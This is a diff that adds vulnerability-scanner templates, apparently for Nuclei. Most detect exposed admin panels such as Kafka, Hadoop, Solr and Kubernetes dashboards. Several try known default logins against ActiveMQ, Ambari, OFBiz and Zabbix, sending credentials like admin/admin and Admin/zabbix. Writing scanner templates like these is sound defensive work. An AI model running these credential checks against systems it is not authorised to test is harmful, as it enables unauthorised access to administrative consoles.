+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/'
+    headers:
+      Authorization: "Basic YWRtaW46YWRtaW4="
+    matchers:
+      - type: word
+        words:
+          - 'Welcome to the Apache ActiveMQ Console of <b>'
+          - '<h2>Broker</h2>'
+        condition: and
+
+    # We could add a request condition block to only send this request if the
+    # site response URL had activeMQ broker stuff in the source.

default-logins/ambari/ambari-default-credentials.yaml

@@ -0,0 +1,19 @@
+id: ambari-default-credentials
+
+info:
+  name: Apache Ambari Default Credentials
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name'
+    headers:
+      Authorization: "Basic YWRtaW46YWRtaW4="
+    matchers:
+      - type: word
+        words:
+          - '"Users" : {'
+          - 'AMBARI.'
+        condition: and

default-logins/ofbiz/ofbiz-default-credentials.yaml

@@ -0,0 +1,20 @@
+id: ofbiz-default-credentials
+
+info:
+  name: Apache OfBiz Default Credentials
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/control/login'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
+    matchers:
+      - type: word
+        words:
+          - "ofbiz-pagination-template"
+          - "<span>Powered by OFBiz</span>"
+        condition: and

default-logins/zabbix/zabbix-default-credentials.yaml

@@ -0,0 +1,26 @@
+id: zabbix-default-credentials
+
+info:
+  name: Zabbix Default Credentials
+  author: pd-team
+  severity: critical
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/index.php'
+    headers:
+      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+      X-Requested-With: XMLHttpRequest
+
+    body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "zabbix.php?action=dashboard.view"
+
+      - type: status
+        status:
+          - 302

dns/cname-service-detector.yaml

@@ -2,7 +2,7 @@ id: cname-service-detector
 
 info:
   name: 3rd party service checker
-  author: bauthard
+  author: pd-team
   severity: info
 
 dns:

dns/servfail-refused-hosts.yaml

@@ -2,7 +2,7 @@ id: servfail-refused-hosts
 
 info:
   name: Servfail Host Finder
-  author: mzack9999
+  author: pd-team
   severity: info
 
 dns:

exposed-panels/active-admin-exposure.yaml

@@ -0,0 +1,17 @@
+id: active-admin-exposure
+
+info:
+  name: ActiveAdmin Admin Dasboard Exposure
+  author: pd-team
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/login'
+    matchers:
+      - type: word
+        words:
+          - "active_admin_content"
+          - "active_admin-"
+        condition: and

exposed-panels/activemq-panel.yaml

@@ -0,0 +1,17 @@
+id: activemq-panel
+
+info:
+  name: Apache ActiveMQ Exposure
+  author: pd-team
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<h2>Welcome to the Apache ActiveMQ!</h2>'
+          - '<title>Apache ActiveMQ</title>'
+        condition: and

exposed-panels/airflow-exposure.yaml

@@ -0,0 +1,18 @@
+id: airflow-exposure
+
+info:
+  name: Apache Airflow Exposure / Unauthenticated Access
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+      - '{{BaseURL}}/admin/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Airflow - DAGs</title>'
+          - '<a href="https://github.com/apache/airflow">'
+        condition: and

exposed-panels/ambari-exposure.yaml

@@ -0,0 +1,17 @@
+id: ambari-exposure
+
+info:
+  name: Apache Ambari Exposure / Unauthenticated Access
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Ambari</title>'
+          - 'href="http://www.apache.org/licenses/LICENSE-2.0"'
+        condition: and

exposed-panels/ansible-tower-exposure.yaml

@@ -0,0 +1,17 @@
+id: ansible-tower-exposure
+
+info:
+  name: Ansible Tower Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - "<title>Ansible Tower</title>"
+          - "ansible-main-menu"
+        condition: and

exposed-panels/atlassian-crowd-panel.yaml

@@ -1,4 +1,5 @@
 id: atlassian-crowd-panel
+
 info:
   name: Atlassian Crowd panel detect
   author: organiccrap

exposed-panels/citrix-vpn-detect.yaml

@@ -2,7 +2,7 @@ id: citrix-vpn-detect
 
 info:
   name: Citrix VPN Detection
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:

exposed-panels/couchdb-exposure.yaml

@@ -0,0 +1,18 @@
+id: couchdb-exposure
+
+info:
+  name: Apache CouchDB Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/_all_dbs'
+    matchers:
+      - type: word
+        words:
+          - CouchDB/
+          - Erlang OTP/
+        part: header
+        condition: and

exposed-panels/couchdb-fauxton.yaml

@@ -0,0 +1,15 @@
+id: couchdb-fauxton
+
+info:
+  name: Apache CouchDB Fauxton Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Project Fauxton</title>'

exposed-panels/django-admin-panel.yaml

@@ -0,0 +1,17 @@
+id: django-admin-panel
+
+info:
+  name: Python Django Admin Panel
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/login/?next=/admin/"
+    matchers:
+      - type: word
+        words:
+          - "<a href=\"/admin/\">Django administration</a>"
+        condition: and
+        part: body

exposed-panels/druid-console-exposure.yaml

@@ -0,0 +1,17 @@
+id: druid-console-exposure
+
+info:
+  name: Alibaba Druid Console Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - 'src="/druid.js"'
+          - 'href="/druid.css"'
+        condition: and

exposed-panels/exposed-pagespeed-global-admin.yaml

@@ -0,0 +1,15 @@
+id: exposed-pagespeed-global-admin
+
+info:
+  name: Apache PageSpeed Global Admin Dashboard Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/pagespeed_admin/'
+    matchers:
+      - type: word
+        words:
+          - "<b>Pagespeed Admin</b>"

exposed-panels/exposed-webalizer.yaml

@@ -0,0 +1,17 @@
+id: exposed-webalizer
+
+info:
+  name: Publicly exposed Webalizer Interface
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/webalizer/'
+    matchers:
+      - type: word
+        words:
+          - "Webalizer Version"
+          - "Usage statistics for"
+        condition: and

exposed-panels/flink-exposure.yaml

@@ -0,0 +1,15 @@
+id: flink-exposure
+
+info:
+  name: Apache Flink Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Apache Flink Web Dashboard</title>'

exposed-panels/hadoop-exposure.yaml

@@ -0,0 +1,15 @@
+id: hadoop-exposure
+
+info:
+  name: Apache Hadoop Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dfshealth.html'
+    matchers:
+      - type: word
+        words:
+          - '<div class="navbar-brand">Hadoop</div>'

exposed-panels/kafka-connect-ui.yaml

@@ -0,0 +1,15 @@
+id: kafka-connect-ui
+
+info:
+  name: Apache Kafka Connect UI Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Kafka Connect UI</title>'

exposed-panels/kafka-monitoring.yaml

@@ -0,0 +1,16 @@
+id: kafka-monitoring
+
+info:
+  name: Apache Kafka Monitor Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '>KafkaMonitor</a>'
+          - '>Kafka Monitor GUI</h1>'

exposed-panels/kafka-topics-ui.yaml

@@ -0,0 +1,15 @@
+id: kafka-topics-ui
+
+info:
+  name: Apache Kafka Topics UI Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Kafka Topics UI - Browse Kafka Data</title>'

exposed-panels/kubernetes-dashboard.yaml

@@ -0,0 +1,15 @@
+id: kubernetes-dashboard
+
+info:
+  name: Kubernetes Console Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+    matchers:
+      - type: word
+        words:
+          - "Kubernetes Dashboard</title>"

exposed-panels/parallels-html-client.yaml

@@ -2,7 +2,7 @@ id: parallels-html-client
 
 info:
   name: Parallels HTML5 Client
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:

exposed-panels/phpmyadmin-panel.yaml

@@ -2,7 +2,7 @@ id: phpmyadmin-panel
 
 info:
   name: phpMyAdmin Panel
-  author: bauthard
+  author: pd-team
   severity: info
 
 requests:

exposed-panels/rocketmq-console-exposure.yaml

@@ -0,0 +1,15 @@
+id: rocketmq-console-exposure
+
+info:
+  name: Apache RocketMQ Console Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - "<title>RocketMq-console-ng</title>"

exposed-panels/selenoid-ui-exposure.yaml

@@ -0,0 +1,17 @@
+id: selenoid-ui-exposure
+
+info:
+  name: Selenoid UI Dashboard Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/login'
+    matchers:
+      - type: word
+        words:
+          - "<title>Selenoid UI</title>"
+          - "/manifest.json"
+        condition: and

exposed-panels/setup-page-exposure.yaml

@@ -0,0 +1,20 @@
+id: setup-page-exposure
+
+info:
+  name: Zenphoto Setup Page Exposure
+  author: pd-team
+  severity: medium
+  description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/zp-core/setup/index.php'
+      - '{{BaseURL}}/zp/zp-core/setup/index.php'
+      - '{{BaseURL}}/gallery/zp-core/setup/index.php'
+      - '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
+    matchers:
+      - type: word
+        words:
+          - Welcome to Zenphoto! This page will set up Zenphoto
+        part: body

exposed-panels/solr-exposure.yaml

@@ -0,0 +1,15 @@
+id: solr-exposure
+
+info:
+  name: Apache Solr Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/solr/'
+    matchers:
+      - type: word
+        words:
+          - "<title>Solr Admin</title>"

exposed-panels/webmin-panel.yaml

@@ -10,7 +10,6 @@ requests:
     path:
       - "{{BaseURL}}/"
       - "{{BaseURL}}/webmin/"
-      - "{{BaseURL}}:10000/"
     redirects: true
     matchers:
       - type: word

exposed-panels/yarn-manager-exposure.yaml

@@ -0,0 +1,18 @@
+id: yarn-manager-exposure
+
+info:
+  name: Apache Yarn ResourceManager Exposure / Unauthenticated Access
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cluster/cluster'
+    matchers:
+      - type: word
+        words:
+          - 'hadoop'
+          - 'resourcemanager'
+          - 'logged in as: dr.who'
+        condition: and

exposed-panels/zipkin-exposure.yaml

@@ -0,0 +1,17 @@
+id: zipkin-exposure
+
+info:
+  name: Zipkin Exposure
+  author: pd-team
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+      - "{{BaseURL}}/zipkin/"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "webpackJsonpzipkin-lens"